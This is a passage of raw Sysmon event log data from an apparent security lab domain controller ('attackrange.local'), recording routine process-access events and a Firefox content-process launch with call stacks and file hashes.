Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90 10341000x800000000000000016714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.724{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000016706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45406928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000016705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45406928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000016704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.692{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000016703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\xul.dll+f54b6e|C:\Program Files\Mozilla Firefox\xul.dll+f725f9|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.626{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.0.1858115837\624602239" -parentBuildID 20210105180113 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 1 -prefMapSize 229288 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 1944 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.614{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.583{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 